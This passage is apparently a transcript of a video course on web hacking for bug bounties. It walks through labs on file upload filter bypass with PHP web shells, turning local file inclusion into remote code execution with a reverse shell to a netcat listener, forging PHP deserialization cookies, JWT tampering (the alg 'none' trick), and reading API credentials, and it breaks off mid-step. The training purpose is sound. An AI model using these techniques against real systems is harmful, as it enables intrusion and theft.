file and then we say file.gift it tells us that it is actually text so if we then come into our file.gif there are something there is something called Magic bytes that we can add in here to try and trick it the way a gif starts is with a gif 8 9 or 87a and if we save something like this and run file on it now it tells us we have a gif an image type and the version so this is how a server would read this if you upload something it's going to run something like a file on it to see if it really is a gif or if it just has text in it and so when we copy all of this right here with the PNG basically what we're trying to do is Trick it by putting something in like this GIF 87a so the way when it reads it it will read it as a PNG and we'll actually try this GIF because I've never actually tried it on this box so I don't know if it will work or not and we'll just try the file upload on the fly so if we send this over it tells us that it looks like it uploaded so we can see what it looks like it did upload so I'm kind of surprised that worked we'll go check it out so if we come over to our uploads we refresh the page and we open this up it looks like it worked we should be able to pass in our parameter of CMD equals and we can say who am I and it tells us right here www data so that actually work I was expecting it to not work and sometimes when you hit a file like this and it does not work it might check for just a DOT PNG inside the file Dot and then the dot PHP and if you just go out to Google and you read about different ways to bypass filters for P for file upload you're going to have a lot of information and that's really what I would recommend you to do this is just the tip of the iceberg on how file upload works so I'm just showing you some basic some basic ways to bypass it but I would also recommend going out to Google and reading about how to bypass a PNG file upload filter or a JPEG and see all the different ways you can buy pads and bypass this so if we come in here and we send this and it renders it tells us this worked as well so we can actually go back and if we refresh this right here and it tells us that this worked so there's one other thing let's play around with the jpeg so if we come in here and we close out of this let's actually just play with it and repeat it and see what happens so if we say it's an image and we say actually let's try the GIF because we already have that set up and we just leave this like this and we delete all of this but and we just type in the 87a with GIF at the front let's see if this works it says invalid file so let's take our PHP shell we'll copy this and let's see if we can just say let's G edit this file and we'll call it file PHP and we'll add in the GIF 8 7A and then we'll put our PHP in here and we'll save this and then we're also going to need our gif file so we have that in there too so that way we can make sure that our content type right here is right so go to proxy so that way it is ready we can try this upload browse let's upload the file with the GIF we'll open make sure that we catch this send it to repeater it looks like that is how it goes I actually want to turn this off it says that it worked okay so it does accept the gif as well now let's upload our reverse shell that we saved in file.php and we'll send this on over to repeater see how we have this application type is different so we can turn this off and see if we can get this to work as well so we'll send this and it says invalid file and when we send this it says that it worked so what we can try and do is just grab this like we did before we'll copy it and paste this in should be able to delete this does that actually have a semicolon in it [Music] it does so it should work like that if we send it it says that it worked so let's go see if we can find that here's the gif says it didn't work that's not surprising because it's not actually an image we need our other PHP shell here's our GIF with our PHP in it so let's try and pass in the same parameter equals who am I and if we send this it tells us this GIF works and it cannot execute the command within the file let's try and just delete this and see if we can get a who am I this way whoa send that come back back refresh check out this PHP and it tells us where ww data so it does let us inject a command with a gif but for some reason I wasn't able to get the web shell to work but there's another way to go about this so this would be a really roundabout way to do this you could come in and we could try and upload like a python shell in here or because we know we have PHP we could put inside of here inside of we could put inside of our Command right here instead of doing a system who am I we could come to this web shell and we could execute a PHP reverse shell like this but you saw us use this recently let's just try and upload this PHP shell and see if we can get this to execute a reverse shell for us so we'll come back over here we can edit this again we'll put in our PHP reverse shell we can open we'll need to catch this inside repeater turn our Interceptor on submit and send over to repeater we can turn this off come to repeater tells us we have an invalid file which we expect we have the shell.php and we'll just use the one with the PNG because we know that it's going to work for us so we can come over here and we can just highlight this paste in the PNG now if we send this it tells us that this worked we can set up a netcat listener over here netcat and I think we originally made that on Port 44444 and now that's listening so now when we open up that file it should execute on the server and it will give us a shell back we can see our PHP file we can see the size has changed so we open this up and it's hanging and we have a shell returned back to us and it's going to tell us I am ww data so that is file upload so there's a bunch of different ways you can play with this if you have hack the box I would recommend coming into popcorn because you have a lot of different ways to play with this you have the JPEG and the GIF the PNG and so you can just come in here and play around with these and see all the different ways you can get a reverse shell from a file upload and I would recommend because we were not able to get the GIF web shell to work you could play around with that and see if you could get a web shell rather than just executing commands one at a time and then maybe see if you can get a reverse shell from the web shell because there will be times that you have to do that inside of ctfs but in the world of bug Bounty you really wouldn't be trying to get a reverse shelf you could just simply do a web shell into who am I for a proof of concept and file uploads are something you're going to see so you can read about those in hack the box and I would definitely recommend going out to Google and continuing your research on file uploads but like I said there's really not a lot of places to practice file upload and it's because if there's a file upload that is going to be vulnerable on a server you can get remote code execution and for this reason hack the box is really the only place that is really good for file upload try hack me has a little bit of file upload but I don't think it's as good as hack the box when it comes to practicing this specific vulnerability try hack means really great in other areas but hack the box is really good for file upload so with that I will see you in the next vulnerability okay welcome to the local file inclusion and the remote file inclusion also known as lfi and RFI portion of this course the lfi is going to be one that is more common than the RFI and the lfi is going to give us the opportunity or the ability to read local files on the server which could lead to a compromise of sensitive information or data that we're not supposed to be able to access and files on the server that we should not be able to access now RFI is going to give us the ability to host up our own files and then have the server reach out to our server that we make on our Cali machine and then execute that file and will lead to remote code execution on the server so we're going to jump into the lfi and the RFI now let's get started welcome to the lfi RFI so the local file inclusion or the remote file inclusion a portion of this course we're going to be using try hack me for our example and and try hack me is just too good to pass up when it comes to practicing lfi and RFI if you can afford a try hack me membership then it is worth it just to come in here and practice your lfi and RFI along with other things and when it comes to hack the Box hack the Box doesn't have any really good place to practice and RFI so sadly you're not if you have only a hack a box membership you're not going to be able to practice this so what we have going on right here this is a really great explanation I'm really happy with how they have this all structured so you have your basic web application right here you have the HTTP the URL and then you have a get dot PHP and this PHP right here is going to be a giveaway of the way we're going to go about trying to pull this file down so oftentimes you're not going to see a DOT PHP but sometimes you will and when you see a DOT PHP and then a file equals just like this you can think you can try for an lfi and we've already talked about directory traversal and typically if something is vulnerable to a directory traversal you are going to be able to pull down files as well and once you have lfi which is pretty bad if you can turn that into remote file inclusion then you have got something really really big going on for you so we have this URL that's going to make a get request to the server for a specific file and it's going to equal the file that you click on and I'm going to show this to you and I think it will make a lot more sense so I've already opened up the lab here when we click on lab1 it tells us it's got this lab1.php and you can come in here and you can just type something in so if we just type in anything because we don't really want to look for a file just yet actually I'll just show you this way so if we come in here and we type in Etsy pass WD and we say include it pulls it down for us but this is not this is not going to happen that's not real world so what will happen is something like this you'll come to a page it'll have like this request right here you're searching for something and say it's a search bar and we just type something in and we intercept this in our proxy and we hit include we'll send this to our repeater we can turn this off and now what happens is it tells us we'll just pretend all this isn't here because this is not going to happen in the real world but this will happen right here this file equals and then what we typed in now this looks like what we had going on over here and this really does happen and up here we can change this and we can now put in this Etsy pass WD and it will pull it down like this and a lot of times you'll have this file equals up here and you can play around with it but rather than using the URL I would rather use burp so we can come over here and we can say send and I like that it tells us we have this nginx server right here and I'm sure if we ran like an nmap scan it would tell us what we're up against completely but we're not going to do that we'll do that in just a minute with an lfi on a hack the Box system and we will test it there but we have this file equals and then we have right here where we can ask whatever file we can ask for whatever file we want so right here we can put in our Etsy pass WD and we can send this and on the page it tells us we have users here and when you're looking for users you can look for the bin Bash that's going to tell us people who have actual users on this box there's actually quite a few of them or a bin sh not a bin bash we have root has it been bash so when you pull this down you can look for users and it's even worse if you can access the Etsy Shadow file because then we can actually pull down password hashes and we don't have the ability to do that so this would be a file inclusion and you can pull down all kinds of files from the server so you can actually pull down let's say we wanted to look at the index.php you can send this and it'll pull down I can't tell if that worked or not um because there's just a bunch of HTML let's render it maybe we can see it yeah so it just pulled down the home page like right here so you can look at different pages in here so let's say you were able to director you were to do some kind of fuzzing on this page and you were looking for different directories and you had a directory that you weren't allowed to look at like a hidden directory in here you could probably include this in the file and it will pull down that hidden page below right here and because we're able to do this local file inclusion when you have local file inclusion it's a great vulnerability to find it's one that it's a pretty severe vulnerability but if you can turn this into a remote file inclusion then it becomes something more so right now we have what's called local file inclusion we're able to get local files that are hosted on the target server but if you're able to have remote file inclusion that means we can include files from our box over here so if you look at what we have in this file we have a shell.php right here and a web shell over here if I have remote file inclusion I can I can have this get request reach out to my server over here that I can host up and I can host up this file right here and it will go get that file and then execute it and then I can have remote code execution on this server and I will own this network so what this looks like an easy way to test for this like if you were to do this in a bug Bounty program and you were just looking for a proof of concept you would just type in sudo python 2 with a simple server and then we would just put in our IP address and see if it reaches out to us so we can go HTTP 10 to 42 96. and we can send this and see if we get a hit over here and we do so this is so this means we can actually get remote code execution on This Server so what we can do now is close out of this we'll re-host up those files and I've already edited and I've already edited the shell.php so you wouldn't have to watch me change the IP address right here so it's all set up and ready so we can host this backup we can come over here and say netcat Port 444 and if we send this right here we want it to grab shell.php and now if we send this it's going to hang right here because we have a shell and we could say who am I and it now tells us we are www data so we now have code execution on this server and this would be pretty much as bad as it gets now I want to show you a little more local file inclusion and how to read pages when they don't render over here when we ask for a specific file and we want to see what's happening and I'm going to switch over to hack the box for this all right I have loaded up the box poison here for us and if you have a hack the box subscription it would definitely be worth your time to open this up and play around with it so you can see if you're able to find any of these lfi files on your own so we're going to go ahead and just play around with this for a little bit and I want to show you some of the things you can do with lfis that can really save you a lot of time and if you're doing ctfs help you find files that are that you shouldn't be able to access so we're going to do the same thing we did before we'll just put in some characters in here and we're going to catch this over in our repeater so we'll hit submit we'll send this over to repeater and then we can turn this our Interceptor off and now you can see before we didn't have this file right here with the browse.php and then the file and then our request so you can like I showed earlier try and get files right here like this which is fine but I like to use repeater just because it goes a lot faster so we're going to go ahead and use repeater so we'll hop over here and if we send this we get this simple message over here saying that it failed to find this through the inclusion and it tells us the path we're using right here so what we can do at this point is we can try and type in Etsy pass WD and if we send this we can see we have the Etsy pass WD file we can you can see we have the Etsy pass WD file right here and it's something to always look through is these the server version you can highlight you can highlight this copy it go to Google see if there's any vulnerabilities and check that type of stuff out especially when you're hunting for bug bounties as well as penetration tests it's always worth looking at and then we can see the users on here is going to be this one right here and then we have root right here is a user the rest of these don't look like they have the ability to log in now on to looking for more files there's a really simple way to go through the files really quickly and I've used the tool fuff a lot with a lot on my channel so we're going to go ahead and we're going to use fuff and I'm just going to leave this in here and delete this a little bit at a time actually we'll just delete this whole thing so we can delete this what we'll need to do is highlight this and copy it paste it into fuff and then right here we're going to want to fuzz but to make sure we make it all the way back to the root I'm going to just put some of these dot dot slashes in here so that we can make sure we go all the way back to the root and then we're going to fuzz and we don't want to fuzz this with the web content what we wanted to look for is the lfi content so we can come back over here and I think we just type in web nope we don't want web shells we want fuzzing right here so we can type in fuzzing and then we want lfi which is right here so we're going to go into that directory and see what's in here and we'll use this one because we're up against a Linux box we can just type in Linux that did not work for me we'll type in like that and now if we run this it should work for us and it does but we don't want all of that output so we're going to filter by aligns and we're going to say if it has five lines don't include it and it's going to give us all the files that we're able to look at now if I was actually doing a CTF I would look through every single one of these to see what we can find now obviously we tried the Etsy pass WD but you can come through and check out all of these files and see if there's anything helpful for you to try and get remote code execution on the box and because we don't have an RFI which I have not actually tried so we'll go ahead and try it and make sure that this does not work and we can put my IP address in here which is 10 10 14 6. it's and it doesn't hang no RFI so we aren't able to include any of our own files to get a shell back that way but you could look through all of these and see if maybe you can find some credentials or something or maybe be able to SSH into the box but this is a quick easy way to fuzz when you have an lfi and in a real bug Bounty situation you wouldn't want to actually enumerate any of this you would only do something like that on a CTF you would really just test for an lfi like I've already shown you and make sure that it is there and then you would submit a report or if you were testing for an RFI you would just do what we did right here and set up a simple server and see if you can reach out to yourself for an RFI and that is the remote file inclusion and the local file inclusion you can go ahead and play with these if you have a try hack me and a hack the box subscription and get used to seeing these you're going to see them a lot inside of ctfs especially lfis rfis are a lot more are rare but they do happen so with that we will move on to the next vulnerability all right we are going to be going over some insecure D serialization and I decided to make a little flow chart here so that you could kind of see what is going to be happening and this is for PHP but the concept is going to be the same for Python and JavaScript as well but the examples we're going to be dealing with is PHP so I decided just to show you PHP it'll make it a lot easier for you as we continue going we're going to have just a few places to practice this is something that there is not actually a lot of places to practice so I wanted to show you here and then I think I'm going to show you an example and then you should be able to solve a few challenges on your own and if not we will walk through them together and I think you get the hang of this pretty quick it's not super difficult but it is something that a lot of people are afraid of but nonetheless let's jump into it so we have what's going to be the waiter and he is the object this would be like if you have a inside of programming there's something called object oriented programming and I don't want to get too much into it but just know that like this is the object and the object can contain different things with inside of it so you have the waiter and he carries a plate and so with the waiter the question would be does the waiter have a plate and it's true or false this would be a Boolean and within PHP it's represented as just a b and then it'll say b equals and it'll be one or a zero so that'll be either true or false so does the waiter have a plate and it would say true and so in this case it would say waiter have a play b equals one and so you'd say here the waiter has a plate and then if he has the plate we come down here and it says like what is on the plate well on the plate there may be a username and the username when you see these quotation marks like this is stored as a string and so the username has a string and So within a object you would see something like s username and then it would have the name and the S is going to stand for the string and then you will have like maybe the person that is being and maybe the object is going to contain an age and so on the plate there's going to be more data and it is going to be an age and it's going to be 25 and it is an integer because it's a number and so this would be represented as an I so it'd be like I age equals 25 and it sounds confusing but we're going to see what this looks like here in just a minute and it will all make sense and I'll come back to this and show it to you once once we get a look at once we look at the full picture of what this looks like inside of a cookie so let's take just a step forward just a little tiny step forward and look at how you're going to go about ex exploiting this and then we'll go ahead and exploit some of these insecure deserialized objects all right so I have opened up a try hack me box here and sadly it's not a real great exam sample for an insecure deserialization vulnerability because I already created a username with the name name my password is name and if we log in it brings us to this page but in the real world if you came to something like this and you just fuzzed this with a fuzzer like something like fluff or go Buster or derb and you would find this directory called admin and Bam you're here and you're in the administrator dashboard which is uh kind of a bummer because you're just automatically in here and it tells you like here's the flag and you've made it inside of the dashboard and so what we can do from in here I want to test this in here and then we'll go back to our user profile and we can just inspect this like we normally would we'll come over to the memory which is where the cookie is going to be stored we'll come over to the storage sorry not the memory where the cookie is going to be storage and it's going to say we have a password our sessions our set session ID and our username and our user type and in changing these cookies right here you can manipulate the user type and the username now inside of burp this also wouldn't be in plain text like it is right here but if we intercept this and we refresh this and we say forward and we'll come and we in we have our Interceptor on and we'll come to the my profile page again and we forward this to right here and we send this to repeater you can get a look at this like here's a username admin password right here like this is what we changed and we have this base64 cookie right here let's see if we can decode it um we get we can get some of it but what you would do with this is usually not going to be in plain text it would be base64 and you would have to decode it and then you can change these things right here so with that I want to send you over to portswiger and we're going to go to the insecure deserialization right here and we're going to walk through some of these and you're going to get the hang of them pretty quick they're not as challenging as you might think so we're going to do this first one right here and if you want you can go ahead and give it a try and see if you can figure out how to pull this off but I want to walk through this one right here and then we're going to go back to the flow chart because I think it's going to make a lot more sense once we do so you can go ahead and give this a try if you would like load it up here and the instructions tell us that we need to use a serialized base session mechanism and vulnerability and we're going to try and exploit it and it says here's our credentials to log in and we need to delete Carlos's account in order to solve this challenge so what we'll do is we can just come over here and we'll need to make an account and I'm going to call my account name and my password name I'm going to intercept this just in case we end up kneading it so we'll intercept this we'll send it I'm going to send this to repeater I don't believe we're going to need it though so we'll leave that there come back over to our proxy um oh we have we need to log in with the username that it gave us so we have right here our username and Peter so we'll log in with this and then it tells us we need to go to that to the admin panel we need to use the session cookie to get it go to the administrator panel or privileges and delete Carlos okay so what we can do here at this point is you're going to come to this on my account but we're going to need to intercept the request it will look like this you can send this to repeater forward forward we'll send this to I don't think we need that one but we'll turn that off we'll come back one send this and see what it looks like and what we can do is you might have this little Interceptor thing closed open that up we can highlight this and it'll decode this for us and it's going to tell us are we an admin and if you remember this is the object right here so the object is called four and it is a user and then we have a string which we have our username and we have another string which is our well right here is our username and then it tells us we're an admin which is also stored as a string and then we have this right here this Boolean are we in admin and it is set to false but we can go ahead and change this to true we can apply the changes I'm going to highlight this cookie just in case this doesn't work we can send it and it says okay it worked if we refresh the page it didn't update our cookie for us so we're going to have to manually come over here and update our cookie and right here's the cookie paste in the one we just made ourselves and now if we refresh the page we should have access to an admin panel and we do right here and you can delete Carlos if you would like this to say solved right here the next one is going to be pretty pretty similar and not really much more difficult than this if you struggled I struggled the first time with figuring out that I needed to actually copy the cookie and inspect and paste it in that's okay you're going to need to do that in the next one as well but we can go ahead and hop over there and check that one out all right so we're going to go ahead and do this second one right here and what you will need to do is I just open it up in a new tab and I also opened up the labs that way we don't have to wait for that to load so we'll read the instructions and it tells us we're going to need to gain access to the administrator account and delete Carlos once again and we have the same username and password so if we come over here we're going to do the same thing we did before and we will log in just like before and now that this has logged Us in we'll come to our proxy we're going to intercept the request check out the my account page send this to repeater come over here send it see what happens we get a 200 okay and now we're going to mess with this cookie once again and you can see there's it looks like there is a lot more going on in here than last time but you can break it down just like before we have our object and then we have a string with our username right here we have the username and then it tells us we have this string right here with our access token in it and then we have this going on right here so what we would need to do with this at this point is this access token is obviously going to be bad for us because it is going to be telling us what we can access and what we can't access so if we just delete that and then we just put in here the B one to make this true we can apply the changes we can actually send this to make sure we don't get an error and it says 200 okay which means this token should work for us right here and so we can I'm going to copy it out of the box just to make sure I don't get anything wrong and now what we'll need to do is come back to our page if we refresh this nothing happens even though we sent it from burp we'll have to inspect and check out the cookie over here change our cookie and then refresh the page and we have the admin panel so this looks really easy but this one actually took me like I would say almost 15 minutes to figure out what exactly was going on inside of repeater I am not a super great I'm not real great with a PHP and so when I was trying to figure this out I finally got this to go be I accidentally left this in a string the first time which is something you may have done and if you try and leave this inside of a string it is going to give you this error over and over and over again that's one mistake that I made over and over as I was messing with this and then the other mistake I made was I was able I deleted this and applied changes and if you send it you'll get the same error and I forgot to delete this so this is really finicky and in the real world you're gonna have to do pretty much what I did and just keep testing this over and over and over until you get a 200 and then you'll know that something has worked for you and one of the other things that I didn't understand and I don't understand still so if you know PHP you might understand this better than I do I have no idea why this says we have an integer of zero in order to get this exploit to work like I this is not how I solved it and I honestly don't have any idea why this access token is an i with a zero but it does work and the way I did it ended up working so if you come over here and you change this to a zero with the Boolean you're going to get this error and then if you come in here and you solve it the way the solution says with the integer of zero apply the changes you can send it it works this way as well and this cookie works but uh just being honest I don't know why this works my version makes sense to me because I have the access token and I'm just going to say that it's true that I have access to wherever I'm I want to go and I send it and it works so if you know why this works with an integer you can feel free to leave a comment in down below because I'm really interested I don't actually know I actually Google to try and figure out why this works with an integer and I couldn't find anything so with that we will move on into the next vulnerability and keep going okay so now that we have looked at the insecure deserialization examples we're going to come back to the flow chart so now if you remember the object right here so we have our object which is the waiter and it is carrying the plate and on the plate we have a username which is Peter and we have the access token right here and so we have a object we have a string and another string right here and it says that this is also carrying a string and then we have our Boolean which is going to be true which allows us to log in as the administrator so now when you see something like this you should be able to understand what's going on at least without it being really really complicated so here's the flowchart once again this is how the insecure deserialization works I hope going from the beginning of this flow chart to now it all makes sense and you can understand what is going on I'll see you in the next vulnerability okay so as we move into this next section we're going to be dealing with cookies and auth tokens so I decided to go ahead and do the first half of the Box Luke on hack the box it's going to be dealing with a Json web token and I decided to show you this because I wanted you to see walking through the process of finding a token and changing it and just how to understand what is going on and then after we look at this box I'm going to set you loose on the two labs and you'll be able to practice manipulating these tokens on your own and then we'll do walkthroughs with those as well I thought it'd actually be helpful to go through the first half of the Box Luke so that you could see a little bit of the enumeration and I've had a few people asking to do more with apis and this box will actually show you how you can communicate with an API I'm going to show you with the actual command line as well as enumerating an API with burp as well and so we'll go ahead and jump into this all right I have already set up the box and I have it running so we should be able to Ping the IP address is 137 and we can see it's a Linux box right here and it is all up and running and it is ready for some enumeration we can run an nmap scan like this and so we can go ahead and run this in map scan and we can see Port 80 comes back really quick so we can run a go Buster or we can try and use fuff on this box and we will use a directory list I imagine a small one would be just fine but we'll use the medium one just to make sure we're able to find everything that we need and I forgot to change the IP address here so we'll fuzz this while our in map scan runs so we got 137 and we'll go ahead and send this on our way we can actually come out to the IP address by typing in 10 10 10 137 since we know Port 80 is open and we are brought to a web page like this we can click around see what's going on you guys know I like to view the page Source I like to look at a lot of the ahrefs and see what's in here I wonder if it has a login in here nope and we can come back and see if fluff has found anything we got member which was a redirect we can check that out see where it redirects to and it doesn't tell us anything and we can check our nmap scan is still going we have Port 21 if this was a penetration testing course I would go out and check Port 21 and FTP but because it is not I'm going to let these scans run and I'll bring you back once they have finished since it seem to be taking longer than I anticipated so what we're going to do is we're going to check out a go Buster because I like to use gobuster for when I need to run an extension such as PHP and fuff does not allow me to do this so what we're going to do is come back over here and we're going to run our Go Buster with as well as fuff with the extension PHP because this isn't this wasn't working for us and we have a bunch of stuff coming back so we can check out the login page this usually is not going to work in a bug batting program but you can type in something like admin admin and it doesn't work and so you can try default credentials and see if it works usually there will be like a made buy down here but there doesn't seem to be so we can't check for any default credentials on this page we have a config.php which is always a good thing to look at especially when you have code execution on a box because it will pull down often the username to the database which is root and we have a password as well and one thing you should know by now especially if you're in an Eden in an intermediate course is it people reuse their passwords so we can copy this password and we'll check our nmap scan and it has not told us but it will tell us when it is done that there is a port 3000 but before that you could come back to this login page right here and try and log in with root and that password we just copied to see if it would work and it doesn't you can and we could try admin with that password to see if it works and it doesn't you could also try administrator or other things like that but we're going to go ahead and open a new tab and at this point we are going and before we mess with this new tab let's go and check port three thousand and we find that this has a that we are getting back Json and this is an API so we are going to see what we can figure out it says an auth token is not supplied and we can curl this and see what happens and see if we can log in because that is how we're going to have this auth token so we can come over here and type in curl and we're going to use a post and then we will go HTTP and the IP address 10 10 10 137 and we're on Port 3000 and we want to log in and I can show you this right here if we go slash log in and the way you would find this login page is by fuzzing the API which I showed in the beginner bug Bounty course so we know that we need to authenticate because that's what it tells us and we need this login page right here and we need to pass in some parameters which is going to be our username so we'll go username and we were told the username root we can try this because that's what we saw on the config.php and we'll need a password as well and we can try the password that we found and then we can close all this off and send it and it tells us forbidden it does not work we're not able to curl it so you could come over here and try admin like we tried before and I spelled admin wrong and we get a token in return which is what we needed so now what I would do is come back here like this we're going to go to burp and we're going to intercept this request we'll send this to repeater and we can let that go if we send this it tells us let's try log in and send this okay and we get an okay back and it tells us we need to authenticate now what we need to do is create a token and so we'll need an authorization token so we can go authorization and then we'll use a bearer and then we're going to paste in our token right here and you can nice and easily highlight to see what's going on here so because this is a Json token we have this right here and this is going to decode this for us over here in our inspector and if yours is closed you can open it up and we can see that this is just telling you it's a token looks like it's shawl 256 and this is the algorithm for it so you'll see this again later and so this is about the token and then this second part is going to hold the information inside the token we have the username admin I think this is when it was created I think this is the time that it would expire and this right here would be the signing token would be the signing key and now we should be able to manipulate this we'll send it and it says we need to authenticate so what we can do is come back to our terminal and it says we have this token right here on the login page so go back to burp we have the login we have the bearer and I had to mess with my authorization here to get this to go through we now have our Json key right here with our username and our shared key right here so now that we have this we should be able to now that we have this we should be able to start enumerating the endpoints of the API and we can check out and if you remember over here where did we run that over here we have all these different things and as we enumerate these endpoints one of the first places we should check is something like users and we can send this and it says we get the users back on the box and because we have this right here and because we now have control over what is going on we can go users and then we could try and and see if maybe there is an endpoint with this person so we can copy this paste it in send it and we now have a password for this user and we can also go back and maybe see if this person has a password we can copy it guess we don't really need to copy it I could just type it out and send it and we have their password as well and with these usernames you could go out and try and log in to the actual web page and see if you can figure out how to get remote code execution but this is the direction of the box now we're not actually trying to get remote code execution what I wanted to show you was these auth tokens and what you can do with them so now we're going to come over here to our Port swiger application here where we have the free labs to practice and we're going to go all the way to the bottom because that's where these are located and I think with what I just showed you you should be able to solve this first lab all on your own so if you would like to go and give this a try then you can do that and if not we'll go ahead and walk through it all right so let's go ahead and read what we are supposed to do it tells us less lab is a Json web token based mechanism for handling sessions due to implementation flaws the server doesn't verify the signature of any of the tokens that it receives to solve the problem we need to gain access to the admin panel located right here then delete the user Carlos so I've gone ahead and clicked access the lab we can come open this up we are told we have the good old same username that we have been using and we can log in we'll log in just like normal we can come over to burp and we will grab the proxy and we can refresh this page and we see our cookie session right here we'll send this over to repeater we can turn that off and now we can look at this token right here we have this right here we have the decoded portion of the cookie and then we can check this out and it tells us right here it was issued by portswiger and we are signed in as this user so we'll change this to admin we can apply changes and now let's check out the see if we can go to the admin panel and it says let's see my account so it looks like we are able to go to the my account admin so actually let's copy this paste it in right here delete that send it not found follow the redirect where does it send us to it tells us we need to log in so that did not work let's try it again let's go my account it tells us we are still logged in so let's grab this again right here we're told that we need to go to the Slash admin and then instructions so we'll come back to this see what we can do with this token we needed was it admin or maybe it was administrator like this we can go to the administrator sign is and sign it we'll try and sign in as the administrator apply changes and now we need to go to the admin directory and this already looks different we have the users right here so if we wanted to delete the user we could just copy this right here and I think it should delete him so if we send this that does not work so what we'll do is we'll just grab this entire token right here and we will copy it come over here and we'll just put it in place of that one forward turn the Interceptor off it tells us that we have solved the lab I guess because we had the Interceptor on when we sent the request right here to delete Carlos it didn't refresh the page because the Interceptor was on so it went ahead and deleted the user for us so that is one way to use these tokens and they might be a little bit difficult in the beginning but I really love this Interceptor over here that just decode stuff for you otherwise you can try and decode this stuff by copying it like this and you can come over to your terminal and you can go Echo Dash in just like this and then you would just paste in the token that you wanted to decode pipe and then we go base 64-d and that will decode it for us you could also just come over to the decoder paste that in and decode as base64 and it'll tell you over here as well so those are different ways to look at these cookies I'm actually curious now this leaves it all as a jumbled mess but I am curious if the decoder can figure this out and I accidentally copied it we'll recopy this send this over here and it does it does get some of it right here if you didn't know that it was separated by the periods you could have brought it over here to the decoder and you could figure out what's going on it's not really that easy to read but you can see that we got the administrator right here and we were issued by portswicker so I mean you could have figured it out but that is this challenge there is another one right here that we are going to walk through so if you would like to open this one up there is a little more to it I I'm not sure you'll be able to figure this one out completely on your own but you can go ahead and play around with it and see if you can figure it out and we'll go ahead and I'll open it up and then we will solve it we are I have opened up the lab right here and we are brought to this page the instructions are pretty much the exact same we need to make it to this panel we log in as this person and we delete this user so we can come over here go to my account we'll get logged in and then we'll intercept the request log in don't save we are logged in so we'll go ahead and intercept the request send to repeater we can shut that off come over to repeater and we can do the exact same thing we had just done before and we're told right here that we are that it's using Shaw 256 as the encryption which I'm guessing is going to be for our session key right here and so what we can do is come back up here and we can change this to none and then we can delete our session key highlight this and we are supposed to be the administrator this time we'll we're supposed to be administrator learned last time that it is not the admin we can apply the changes and we'll come back over here and see if we can go admin and we can send this says we are unauthorized let's try and look at this again I did not apply the changes right here so we can say none apply send this and we have made it and from here we know what we need to do with highlighting this and going over here and trying to delete it but I want to try this a little different this time so I want to copy this token and I want to put it in directly myself and see if I can make it over this direction make it over this way it I think it should work try this a little different uh and and it works so we can come over here and delete the user this way and you can put the session token in right here so these are a few different ways you can bypass authentication through tokens and session cookies you will just have to play around with these as you find them on live programs they're not always going to be like they're just not always going to be really straightforward so what you could do is look for what uses a period as a separation inside of a cookie or inside of a session token and these are things you're just going to get used to over time seeing and not understanding what it is and then looking it up this is also one reason it would be great for you to read the web Hacker's handbook and other web application penetration testing books or even the activity because you're going to see things like this and you'll be like what is this period what is going on right here and as you read you will learn how to recognize these different things it's okay if you didn't recognize them this time I bet you will recognize it the next time you come across it so with that we will continue on okay I decided to include this little section right here on attacking WordPress websites because to my surprise the more I am in the web application testing world I am surprised at how many people use WordPress and even if they don't use it on their main site there will be sub domains or sometimes they'll have other domains or subdomains that are also in scope that will have WordPress especially if they have like a 4 forms or a Blog so WordPress is something that you should be aware of and know how to enumerate and attack it and so we're going to do a few hack the Box WordPress walkthroughs now just until we get remote code execution or find vulnerable files so that way you can see how you should attack WordPress and WordPress is becoming more common so I decided to include this in here because I don't think a lot of people in the bug Bounty World attack WordPress the way a penetration tester would so we're going to look at these from a penetration tester perspective and how you would go about attacking them but also along the way you can look for bugs as you enumerate WordPress sites so let's go ahead and jump into this all right I have a spun up the box tenant for us to walk through we're going to be doing it two different boxes that have to do with WordPress and I think this is something that you should really know well because you're going to see these definitely in ctfs as well as in bug Bounty programs a lot of bug binding programs you'll notice actually we'll put the blog or some kind of forum sites in the not eligible category or out of scope which really is a mistake because a lot of Wordpress sites actually do have vulnerabilities in them and you're going to see them a lot in ctfs and we're going to cover a couple of those now so I have already opened up I have already started the server so we are going to be at IP 1010 223 and then we can come here and we're brought to this default page and one of the things we should always do is try and Run f or go Buster I'm going to use fuff because it is already set up here for me so we'll just change this to actually because this is going to be a WordPress site we're going to run Go Buster because we will want to have this extension for the PHP right here so we can come back here and set this up two two three and let that run all right so I got gobuster working it turns out that it wasn't working because I had been disconnected from the box but now it is up and going and we see that there is a slash WordPress so we can come up here type in slash WordPress and see what we come across we come to this page right here we can view page Source see what is in here and there is an href to this tenant.hdb and if you're familiar with hack the box and then you know that you frequently have to add things to your Etsy host file and the IP address is 10 10 10 2 2 3. and it is tenant.htb now we should be able to save this and browse out to this page so tinit.htb I want to go here and it loads this page for us now one of the first things you're going to do anytime you come to a WordPress page or a blog page in general is just look at these posts here and you can see you have protagonist as an author which could possibly be a user we can look at this one same user same author and we can look here same author there is a comment by Neil you could put this in your back pocket as a potential user and then it says did you remove seder PHP file from the backup I'm not really sure why somebody would have write this right here rather than let the person know elsewhere but you could try and come in here and type in the seder.php and see if anything is there it doesn't look like it but you could come over to where we know we have this WordPress and we could say WP Dash login dot PHP my and you could try and log in with admin admin or admin administrator I think you actually can come over here and do an admin.php nope let's see if it's just slash admin and there is this login page it tells us it just redirected us here to the login page so not able to do anything with this and we'll just come back to that main page we can come back over here to this there was no sata.php but we could try it over here and we can run it and it tells us that it's grabbing users from a text file which would be interesting I wonder if you can go users.txt nothing let me go back and it just tells us success we're not able to actually grab any of those users so he said it was from a backup file and often when you see a backup file it's going to be a DOT back and it works for us so we can save that to our downloads and we can CD to desktop we can move um I'm not sure what that saved as saved as sader.back so we can come over here move and then we'll go and we'll move this to the current working directory which is going to be our desktop now if we LS we have it right here we can cat that file out and look to see what's going on now when I saw this I had to go straight out to Google and look up serialization for PHP because I am not really familiar with it and when you come out to Google and you just look up serialization for PHP and then you can just click this top one and when you look through here it looks really similar to what we just saw and then it actually walks us through how this works so when I saw this I was like okay this must be what is happening and you're going to have a serialized object and so you might even be able to go and type in object like this and let's see what happens if we get it into a Json this is stack Overflow and you can just look through here this is what I did to figure this out remembering that you are going to have to use your Google skills and this looks even more like what we just saw right here so we know we're going to have to do something along these lines and we have it getting a repo and then it has this unserialized input being called so what we can do is just grab this right here and we can make our own serialized object so we'll do this here we'll CD into the desktop and we'll get it and we'll call it mine.php and now we will change this to fit our needs so instead of going user.txt we'll go phone.php we can leave this because this is where this this is going to be our object and then inside the data we can put in our little reverse shell that we have seen earlier so we'll grab a PHP and that will do a web shell first and then we'll do a reverse shell to make sure that it works for remote code execution we can just grab this same one we've been using throughout this course where did my text file go right here and we can just paste 